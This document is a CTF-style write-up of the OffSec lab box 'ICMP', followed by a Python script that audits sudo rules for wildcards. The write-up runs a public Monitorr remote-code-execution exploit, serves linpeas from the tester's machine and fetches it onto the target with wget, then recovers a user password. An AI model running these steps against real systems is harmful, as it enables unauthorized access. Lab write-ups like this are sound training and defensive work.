Offsec - ICMP - Nov 4th 2023
Given Target [LAB_IP]
rustscan [LAB_IP]
22/tcp open ssh syn-ack
80/tcp open http syn-ack
nmap -sC -sV -p22,80 [LAB_IP] -oN icmp.nmap -v
dirbuster
http://[LAB_IP]
Monitorr software on home page v 1.7.6m
searchsploit found
searchsploit monitorr 10:26:23
Monitorr 1.7.6m - Authorization Bypass | php/webapps/48981.py
Monitorr 1.7.6m - Remote Code Execution (Unauthenticated) | php/webapps/48980.py
Shellcodes: No Results
Papers: No Results
Target url: http://[LAB_IP]/mon/
python3 48980.py http://[LAB_IP]/mon/ [LAB_IP] 4444
got em
![[Pasted image 20231104122952.png]]
[HASH_REDACTED]
Priv Esc
No curl for linpeas non download
download method
python -m http.server 80
wget http://[LAB_IP]/linpeas.sh
chmod +x linpeas.sh
Not normally vuln.
Strange file in Fox's desktop ![[Pasted image 20231104124120.png]]
seems to be an encrypted password with "da" as the decrypt key
BUHNIJMONIBUVCYTTYVGBUHJNI , da //de seems to be the encrypt key
ssh fox@[LAB_IP]
tried it and it seems it's his password
now I'm him
![[Pasted image 20231104124622.png]]
Finally actually have a password
$ sudo -l
[sudo] password for fox:
Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3
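
An added example, not part of the original notes: an audit script that parses `sudo -l` output like the one above and flags root rules whose arguments contain a sudoers wildcard, because `*` there matches any further options the caller appends. The function names and the heuristics are assumptions of this example, and it handles one command per line, as in the sample.

```python
import re

# Sample copied from the sudo -l output in these notes.
SAMPLE = """\
Matching Defaults entries for fox on icmp:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User fox may run the following commands on icmp:
    (root) /usr/sbin/hping3 --icmp *
    (root) /usr/bin/killall hping3
"""

# "(runas) [TAG: ...] /path/to/cmd [args]"
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmd>\S+)(?:\s+(?P<args>.*))?$"
)

def parse_rules(text):
    """Return one dict per command line listed after 'may run the following commands'."""
    rules, in_cmds = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        m = RULE.match(line) if in_cmds else None
        if m:
            rules.append({"runas": m["runas"], "tags": m["tags"].split(),
                          "cmd": m["cmd"], "args": (m["args"] or "").strip()})
    return rules

def findings(rule):
    """Heuristic checks (assumptions of this example, not a complete policy)."""
    out = []
    runas_user = rule["runas"].split(":")[0].strip()
    if runas_user in ("root", "ALL"):
        if re.search(r"[*?\[]", rule["args"]):
            out.append("wildcard in arguments: caller can append arbitrary options")
        if rule["args"] == "":
            out.append("no argument restriction: any arguments accepted")
    if "NOPASSWD:" in rule["tags"]:
        out.append("NOPASSWD")
    return out

if __name__ == "__main__":
    for r in parse_rules(SAMPLE):
        for f in findings(r):
            print(f"{r['cmd']} {r['args']} -> {f}")
```

A rule that needs a fixed invocation should list the exact arguments with no wildcard; the `killall hping3` entry above is an example of that form.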